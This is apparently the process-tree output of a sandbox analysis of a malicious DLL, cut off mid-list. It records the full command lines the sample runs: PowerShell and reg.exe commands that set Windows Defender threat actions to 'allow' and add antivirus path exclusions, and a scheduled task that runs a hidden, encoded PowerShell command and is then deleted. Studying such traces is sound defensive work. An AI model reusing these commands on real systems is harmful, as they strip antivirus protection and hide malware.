rundll32.exerundll32.exezvaxoElgmdJsrYMK.exepowershell.execmd.exedescription pid process target process PID 2484 wrote to memory of 908 2484 rundll32.exe rundll32.exe PID 2484 wrote to memory of 908 2484 rundll32.exe rundll32.exe PID 2484 wrote to memory of 908 2484 rundll32.exe rundll32.exe PID 908 wrote to memory of 3240 908 rundll32.exe zvaxoElgmdJsrYMK.exe PID 908 wrote to memory of 3240 908 rundll32.exe zvaxoElgmdJsrYMK.exe PID 908 wrote to memory of 3240 908 rundll32.exe zvaxoElgmdJsrYMK.exe PID 3240 wrote to memory of 1008 3240 zvaxoElgmdJsrYMK.exe powershell.exe PID 3240 wrote to memory of 1008 3240 zvaxoElgmdJsrYMK.exe powershell.exe PID 3240 wrote to memory of 1008 3240 zvaxoElgmdJsrYMK.exe powershell.exe PID 1008 wrote to memory of 2812 1008 powershell.exe cmd.exe PID 1008 wrote to memory of 2812 1008 powershell.exe cmd.exe PID 1008 wrote to memory of 2812 1008 powershell.exe cmd.exe PID 2812 wrote to memory of 3272 2812 cmd.exe reg.exe PID 2812 wrote to memory of 3272 2812 cmd.exe reg.exe PID 2812 wrote to memory of 3272 2812 cmd.exe reg.exe PID 1008 wrote to memory of 3052 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3052 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3052 1008 powershell.exe reg.exe PID 1008 wrote to memory of 1328 1008 powershell.exe reg.exe PID 1008 wrote to memory of 1328 1008 powershell.exe reg.exe PID 1008 wrote to memory of 1328 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3620 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3620 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3620 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3808 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3808 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3808 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2140 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2140 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2140 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2072 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2072 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2072 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3180 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3180 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3180 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3812 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3812 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3812 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2284 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2284 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2284 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3540 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3540 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3540 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2228 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2228 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2228 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3908 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3908 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3908 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2868 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2868 1008 powershell.exe reg.exe PID 1008 wrote to memory of 2868 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3096 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3096 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3096 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3536 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3536 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3536 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3628 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3628 1008 powershell.exe reg.exe PID 1008 wrote to memory of 3628 1008 powershell.exe reg.exe PID 1008 wrote to memory of 416 1008 powershell.exe reg.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll,#11⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll,#12⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\zvaxoElgmdJsrYMK.exe"C:\Users\Admin\AppData\Local\Temp\XDiMVUwYizJKBFrs\zvaxoElgmdJsrYMK.exe" /S3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:326⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BsZkTgYBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BsZkTgYBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzYifeKYfmykC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\CzYifeKYfmykC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HJbvTEnmUxKU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HJbvTEnmUxKU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IjkjItfMxIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IjkjItfMxIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oJCzsrkBUUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oJCzsrkBUUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ehtkUBLERmscXYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ehtkUBLERmscXYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mXZOChzNWSbPIDPW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mXZOChzNWSbPIDPW\" /t REG_DWORD /d 0 /reg:64;"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:326⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BsZkTgYBU" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\CzYifeKYfmykC" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HJbvTEnmUxKU2" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IjkjItfMxIE" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oJCzsrkBUUUn" /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ehtkUBLERmscXYVB /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ehtkUBLERmscXYVB /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\IWAenyPBsptMo /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\slVnQhHzYvLIgZfFZ /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mXZOChzNWSbPIDPW /t REG_DWORD /d 0 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mXZOChzNWSbPIDPW /t REG_DWORD /d 0 /reg:645⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTKMCympe" /SC once /ST 06:27:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTKMCympe"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gTKMCympe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:326⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:645⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:325⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:645⤵
-
